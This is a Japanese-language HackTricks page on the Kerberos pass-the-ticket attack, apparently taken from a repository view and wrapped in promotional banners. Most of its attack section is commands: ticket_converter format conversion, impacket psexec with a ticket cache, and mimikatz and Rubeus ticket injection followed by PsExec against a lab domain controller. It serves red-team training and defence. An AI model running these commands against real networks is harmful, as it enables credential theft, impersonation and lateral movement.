hacktricks/windows-hardening/active-directory-methodology/pass-the-ticket.md

5.4 KiB
Raw Blame History

チケットの渡し方

htARTEHackTricks AWS Red Team Expertを通じて、ゼロからヒーローまでAWSハッキングを学びましょう

HackTricksをサポートする他の方法


Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築および自動化します。
今すぐアクセスしてください:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}

チケットの渡し方PTT

チケットの渡し方PTT攻撃方法では、攻撃者はユーザーのパスワードやハッシュ値ではなく、認証チケットを盗みます。この盗まれたチケットは、ユーザーをなりすましてネットワーク内のリソースやサービスに不正アクセスを取得するために使用されます。

参照

LinuxとWindowsのチケットをプラットフォーム間で交換する

ticket_converterツールは、チケット自体と出力ファイルを使用してチケット形式を変換します。

python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

パスザチケット攻撃

WindowsではKekeoを使用できます。

export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass

{% endcode %}

{% code title="Windows" %}

#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

{% endcode %}

参考文献


Trickestを使用して、世界で最も先進的なコミュニティツールによって強化されたワークフローを簡単に構築および自動化します。
今すぐアクセスしてください:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}

ゼロからヒーローまでのAWSハッキングを学ぶ htARTEHackTricks AWS Red Team Expert

HackTricksをサポートする他の方法